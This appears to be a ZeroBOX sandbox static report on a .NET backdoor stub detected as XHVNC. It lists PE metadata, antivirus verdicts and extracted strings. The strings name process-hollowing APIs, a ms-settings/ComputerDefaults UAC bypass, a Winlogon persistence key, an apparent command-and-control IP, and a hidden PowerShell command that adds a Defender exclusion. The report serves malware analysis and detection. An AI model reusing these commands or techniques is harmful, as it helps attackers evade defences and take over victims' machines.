Static | ZeroBOX

PE Compile Time

2072-05-25 16:49:26

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

Name    Virtual Address  Virtual Size  Size of Raw Data  Entropy
.text   0x00002000       0x000086f4    0x00008800        7.32175704432
.rsrc   0x0000c000       0x0000057c    0x00000600        3.97743178227
.reloc  0x0000e000       0x0000000c    0x00000200        0.0815394123432

Resources

Name         Offset      Size        Language      Sub-language     File type
RT_VERSION   0x0000c090  0x000002ec  LANG_NEUTRAL  SUBLANG_NEUTRAL  data
RT_MANIFEST  0x0000c38c  0x000001ea  LANG_NEUTRAL  SUBLANG_NEUTRAL  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

Library mscoree.dll:
0x402000 _CorExeMain

!This program cannot be run in DOS mode.
v4.0.30319
#Strings
8872D11A1CDB3D7BE4BAE2010F11A89F31AD8E190C62D3C611A7532D649ED811
kernel32
Microsoft.Win32
ToInt32
cbReserved2
lpReserved2
__StaticArrayInitTypeSize=19424
ToInt16
get_UTF8
<Module>
<PrivateImplementationDetails>
DelegateCreateProcessA
LoadLibraryA
KillHVNC
StartHVNC
DESKTOP_JOURNALRECORD
ExclusionWD
SW_HIDE
CCHDEVICENAME
CCHFORMNAME
DESKTOP_ENUMERATE
DESKTOP_JOURNALPLAYBACK
DF_ALLOWOTHERACCOUNTHOOK
DESKTOP_HOOKCONTROL
STARTUP_INFORMATION
PROCESS_INFORMATION
System.IO
DESKTOP_SWITCHDESKTOP
SECURITY_ATTRIBUTES
DESKTOP_READOBJECTS
DESKTOP_WRITEOBJECTS
DESKTOP_CREATEMENU
set_IV
DESKTOP_CREATEWINDOW
CreateDesktopW
DecryptData_Data
Decompress_Data
DecryptData
mscorlib
Microsoft.VisualBasic
ThreadId
ProcessId
GetProcessById
bytesRead
DelegateResumeThread
thread
IsInstalled
lpReserved
method
device
deviceMode
FileMode
CryptoStreamMode
CompressionMode
EndInvoke
BeginInvoke
IDisposable
compatible
ThreadHandle
RuntimeFieldHandle
RuntimeTypeHandle
GetTypeFromHandle
ProcessHandle
bInheritHandle
handle
InstallFile
lpTitle
get_MainModule
ProcessModule
get_Name
get_FileName
get_FullName
applicationName
desktopName
DirectoryName
filename
commandLine
Combine
ValueType
MethodBase
Dispose
Create
MulticastDelegate
SetApartmentState
Delete
CompilerGeneratedAttribute
GuidAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
StandardModuleAttribute
AssemblyTrademarkAttribute
TargetFrameworkAttribute
dwFillAttribute
AssemblyFileVersionAttribute
AssemblyConfigurationAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyCompanyAttribute
RuntimeCompatibilityAttribute
dLByte
GetValue
SetValue
Stub.exe
dwXSize
dwYSize
get_Size
bufferSize
SizeOf
System.Threading
Encoding
System.Runtime.Versioning
FromBase64String
ToString
GetString
Substring
get_ExecutablePath
GetTempPath
GetFolderPath
get_Length
nLength
length
LoadApi
CreateApi
AsyncCallback
callback
accessMask
Marshal
kernel32.dll
user32.dll
FileStream
CryptoStream
GZipStream
MemoryStream
Program
System
SymmetricAlgorithm
ICryptoTransform
hidden
bytesWritten
System.IO.Compression
Application
processInformation
DelegateZwUnmapViewOfSection
System.Reflection
set_Position
Exception
HandleRun
TryRun
MethodInfo
FileInfo
FileSystemInfo
startupInfo
ParameterInfo
DirectoryInfo
CreateDesktop
lpDesktop
hNewDesktop
SpecialFolder
folder
Buffer
buffer
Identifier
Installer
CurrentUser
ToGenericParameter
GetDelegateForFunctionPointer
BitConverter
hStdError
.cctor
lpSecurityDescriptor
CreateDecryptor
IntPtr
System.Diagnostics
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
DebuggingModes
inheritHandles
GetProcesses
set_Attributes
threadAttributes
FileAttributes
processAttributes
attributes
ReadAllBytes
GetBytes
creationFlags
dwFlags
System.Windows.Forms
Contains
Conversions
dwXCountChars
dwYCountChars
RuntimeHelpers
GetParameters
FileAccess
hProcess
process
GetProcAddress
baseAddress
address
Decompress
get_Exists
Concat
Object
object
protect
op_Explicit
IAsyncResult
result
Environment
environment
get_EntryPoint
ParameterizedThreadStart
Convert
ipport
hStdInput
hStdOutput
System.Text
DelegateWow64GetThreadContext
DelegateGetThreadContext
DelegateWow64SetThreadContext
DelegateSetThreadContext
context
GetConsoleWindow
wShowWindow
nCmdShow
DelegateVirtualAllocEx
InitializeArray
ToArray
set_Key
CreateSubKey
OpenSubKey
GetRegKey
RegistryKey
System.Security.Cryptography
Assembly
BlockCopy
DelegateReadProcessMemory
DelegateWriteProcessMemory
CreateDirectory
currentDirectory
InstallRegistry
op_Equality
IsNullOrEmpty
WrapNonExceptionThrows
Copyright
2021
$835bcf68-5f0d-428b-bf86-f859a34555d8
1.0.0.0
.NETFramework,Version=v4.5.2
FrameworkDisplayName
.NET Framework 4.5.2
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
RemoteDesktop
Windows\explorer.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
kernel32
ResumeThread
Wow64SetThreadContext
SetThreadContext
Wow64GetThreadContext
GetThreadContext
VirtualAllocEx
WriteProcessMemory
ReadProcessMemory
ZwUnmapViewOfSection
CreateProcessA
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb25c
explorer.exe,
U29mdHdhcmVcTWljcm9zb2Z0XFdpbmRvd3MgTlRcQ3VycmVudFZlcnNpb25cV2lubG9nb24=
Software\Classes\ms-settings\shell\open\command
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath '
DelegateExecute
C:\Windows\System32\ComputerDefaults.exe
193.142.146.64
Default
VOerOCQof
fOWeBGYAp
TxTKzZWFO.exe
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
CompanyName
FileDescription
FileVersion
1.0.0.0
InternalName
Stub.exe
LegalCopyright
Copyright
2021
LegalTrademarks
OriginalFilename
Stub.exe
ProductName
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.InjectorX.4!c
Elastic malicious (high confidence)
ClamAV Win.Packed.Injectorx-9916498-0
CMC Clean
CAT-QuickHeal Trojan.YakbeexMSIL.ZZ4
Skyhigh GenericRXVK-HN!76A22609F559
ALYac Clean
Cylance Unsafe
Zillya Trojan.Injector.Win32.1588661
CrowdStrike win/malicious_confidence_100% (D)
Alibaba Backdoor:MSIL/XHVNC.607c98c3
K7GW Trojan ( 005309d11 )
K7AntiVirus Trojan ( 005309d11 )
huorong Trojan/MSIL.Injector.fx
Baidu Clean
VirIT Trojan.Win32.MSIL_Heur.A
Paloalto generic.ml
Symantec ML.Attribute.HighConfidence
tehtris Clean
ESET-NOD32 a variant of MSIL/Injector.LOS
APEX Malicious
Avast Win32:InjectorX-gen [Trj]
Cynet Clean
Kaspersky HEUR:Trojan.Win32.Generic
BitDefender Gen:Heur.MSIL.Krypt.6
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Gen:Heur.MSIL.Krypt.6
Tencent Win32.Trojan.Generic.Bplw
Sophos Mal/Generic-R
F-Secure Trojan.TR/Dropper.Gen
DrWeb Trojan.InjectNET.17
VIPRE Gen:Heur.MSIL.Krypt.6
TrendMicro TROJ_GEN.R014C0DJ524
McAfeeD ti!B39FC6259274
Trapmine Clean
CTX exe.unknown.krypt
Emsisoft Gen:Heur.MSIL.Krypt.6 (B)
Ikarus Win32.Outbreak
FireEye Generic.mg.76a22609f559db1a
Jiangmin Clean
Webroot W32.Malware.Gen
Varist W32/MSIL_Troj.C.gen!Eldorado
Avira TR/Dropper.Gen
Fortinet MSIL/Injector.B!tr
Antiy-AVL Clean
Kingsoft malware.kb.c.853
Gridinsoft Trojan.Win32.Downloader.sa
Xcitium Clean
Arcabit Trojan.MSIL.Krypt.6
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.Win32.Generic
Microsoft Backdoor:MSIL/XHVNC.A!MTB
Google Detected
AhnLab-V3 Trojan/Win.Generic.C5281753
Acronis Clean
McAfee GenericRXVK-HN!76A22609F559
TACHYON Clean
VBA32 Trojan.MSIL.DiscoStealer.Heur
Malwarebytes Trojan.Injector
Panda Trj/GdSda.A
Zoner Clean
TrendMicro-HouseCall TROJ_GEN.R014C0DJ524
Rising Exploit.UACBypass!1.DEAD (CLASSIC)
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.300983.susgen
GData Gen:Heur.MSIL.Krypt.6
AVG Win32:InjectorX-gen [Trj]
DeepInstinct MALICIOUS
alibabacloud Trojan:MSIL/Injector.LOS
No IRMA results available.